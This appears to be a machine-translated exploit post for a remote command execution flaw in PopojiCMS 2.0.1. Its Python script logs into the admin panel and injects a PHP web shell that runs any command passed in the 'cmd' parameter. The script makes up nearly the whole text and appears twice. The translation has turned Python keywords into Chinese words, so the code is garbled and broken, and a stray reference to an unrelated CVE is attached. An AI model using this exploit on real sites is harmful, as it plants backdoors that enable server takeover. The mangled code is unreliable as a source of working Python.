#利用title: Popojicms 2.0.1-远程命令执行
#日期: 14/04/2024
#利用作者: ahmetümitBayram
#供应商homepage3360 https://www.popojicms.org/
#软件link:
#版本:版本: 2.0.1
#测试在: https://www.softaculous.com/apps/cms/popojicms
导入请求
进口时间
导入系统
DEF漏洞利用(URL,用户名,密码):
login_url=f'{url}/po-admin/route.php?mod=loginact=proclogin'
login_data={'username':用户名,'password':密码}
标题={'content-type':'应用程序/x-www-form-urlencoded','referer': f
'{url}/po-admin/index.php'}
session=requests.session()
login_response=session.post(login_url,data=login_data,headers=标题)
如果login_response.text:中的“管理员popojicms”
打印('登录成功!')
Time.Sleep(1)#1 Saniye Bekle
其他:
打印(“登录失败!”)
返回
edit_url=f'{url}/po-admin/route.php?mod=setTingAct=meterasocial'
edit_data={'meta_content':'''html
身体
form method='get'name='?php echo basename($ _ server ['php_self']);
输入类型='text'名称='cmd'autocus id='cmd'size='80'
输入类型='submit'value='execute'
/形式
pre
php
if(isset($ _ get ['cmd']))
{
系统($ _ get ['cmd']);
}
?
/pre
/身体
/html'''}
edit_response=session.post(edit_url,data=edit_data,headers=headers)
如果在edit_response.text:中'cmd'
打印(“壳已经准备就绪:”,URL)
时间。
其他:
打印(“利用失败!”)
返回
如果name=='__ -Main __':
如果Len(sys.argv)!=4:
打印('kullanım
ython exploit.py SiteName用户名密码')
sys.exit(1)
url=sys.argv [1]
用户名=sys.argv [2]
密码=sys.argv [3]
打印(“利用.”)
时间。
打印('登录.')
时间。
利用(URL,用户名,密码)
#日期: 14/04/2024
#利用作者: ahmetümitBayram
#供应商homepage3360 https://www.popojicms.org/
#软件link:
正在加载...
github.com
#测试在: https://www.softaculous.com/apps/cms/popojicms
导入请求
进口时间
导入系统
DEF漏洞利用(URL,用户名,密码):
login_url=f'{url}/po-admin/route.php?mod=loginact=proclogin'
login_data={'username':用户名,'password':密码}
标题={'content-type':'应用程序/x-www-form-urlencoded','referer': f
'{url}/po-admin/index.php'}
session=requests.session()
login_response=session.post(login_url,data=login_data,headers=标题)
如果login_response.text:中的“管理员popojicms”
打印('登录成功!')
Time.Sleep(1)#1 Saniye Bekle
其他:
打印(“登录失败!”)
返回
edit_url=f'{url}/po-admin/route.php?mod=setTingAct=meterasocial'
edit_data={'meta_content':'''html
身体
form method='get'name='?php echo basename($ _ server ['php_self']);
输入类型='text'名称='cmd'autocus id='cmd'size='80'
输入类型='submit'value='execute'
/形式
pre
php
if(isset($ _ get ['cmd']))
{
系统($ _ get ['cmd']);
}
?
/pre
/身体
/html'''}
edit_response=session.post(edit_url,data=edit_data,headers=headers)
如果在edit_response.text:中'cmd'
打印(“壳已经准备就绪:”,URL)
时间。
其他:
打印(“利用失败!”)
返回
如果name=='__ -Main __':
如果Len(sys.argv)!=4:
打印('kullanım
ython exploit.py SiteName用户名密码')sys.exit(1)
url=sys.argv [1]
用户名=sys.argv [2]
密码=sys.argv [3]
打印(“利用.”)
时间。
打印('登录.')
时间。
利用(URL,用户名,密码)
![[CVE-2020-14644]-远程命令执行](https://hackhub.org/data/avatars/s/0/2.jpg){kind=small}
